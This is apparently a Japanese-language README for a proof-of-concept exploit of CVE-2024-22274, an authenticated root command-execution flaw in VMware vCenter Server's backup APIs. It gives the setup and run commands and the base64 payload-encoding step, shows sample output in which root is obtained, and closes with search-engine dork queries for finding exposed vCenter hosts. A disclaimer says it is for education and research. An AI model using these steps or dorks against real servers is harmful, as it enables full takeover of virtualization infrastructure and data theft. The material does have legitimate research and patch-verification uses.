
PoC - VMware vCenter Server における認証済みリモートコード実行(エクスプロイト)
「com.vmware.appliance.recovery.backup.job.create」および 「com.vmware.appliance.recovery.backup.validate」APIコンポーネントは、フラグ インジェクション攻撃に対して脆弱であり、これを利用してターゲットシステム上でrootユーザーとして 任意のコマンドを実行できる可能性があります。
[!NOTE] このPoCエクスプロイトを使用するには、有効な認証情報を持ち、SSH経由でVMware vCenter Serverシェルにログインする必要があります。ユーザーは
vcenter_creds.txtファイルに指定されているとおり、"admin" ロールを持っている必要があります。
$ git clone https://github.com/l0n3m4n/CVE-2024-22274-RCE.git
$ cd CVE-2024-22274-RCE
$ python3 -m venv venv && source venv/bin/activate
$ pip install -r requirements.txt
user2base64.shを実行または変更して、追加した newuser を base64 にエンコードし、自動的にpayload.txtを作成します。
$ bash user2base64.sh
Payload has been encoded to base64, saved payload.txt


$ python3 CVE-2024-22274-RCE.py -t 192.168.56.103 -P 22 -p payload.txt -c vCenter_creds.txt
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output:
uid=0(root) gid=0(root) groups=0(root)
[+] Exploitation successful: You have root access.
[+] Finished executing commands on 192.168.56.103
この例は、接続は成功しているが、ペイロードが正しく設定またはロードされていないことを意味します。詳細については PDF PoCを参照 してください。
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output:
No privileges escalation detected.
[+] Exploitation failed: Root access not obtained.
[+] Finished executing commands on 192.168.56.103
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[-] Error: Username or password not found in configuration file.
ホストアドレスと認証情報を確認してください。
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[-] Error: [SSH Error] Connection to 192.168.56.103 failed.
"VMware vCenter", フィルタ: services.port: 443 AND tags: "VMware"title="VMware vCenter", フィルタ: port="443" && title="VMware vCenter""VMware vCenter", フィルタ: port:443 "VMware vCenter"このエクスプロイトPoCは、スクリプトを解釈する方法を理解していないと効果がありません。このスクリプトは、「スクリプトキディ」が理解せずに単にコピーして実行することを防ぐために意図的に変更されています。VMware vCenter Serverは仮想化環境を管理する上で重要なコンポーネントであり、誰かがアクセスできれば仮想インフラストラクチャを完全に制御し、機密データを外部に持ち出すことができます。このPoCは、すでに小さな技術的専門知識を持っている人が正しく使用できるように設計されています。そのため、影響を理解せずに混乱を引き起こそうとするスクリプトキディにとって、このエクスプロイトは役に立たないでしょう。
このツールは、教育および研究目的のみで提供されています。作成者は、このツールによって引き起こされた誤用や損害について一切の責任を負いません。 issueを作成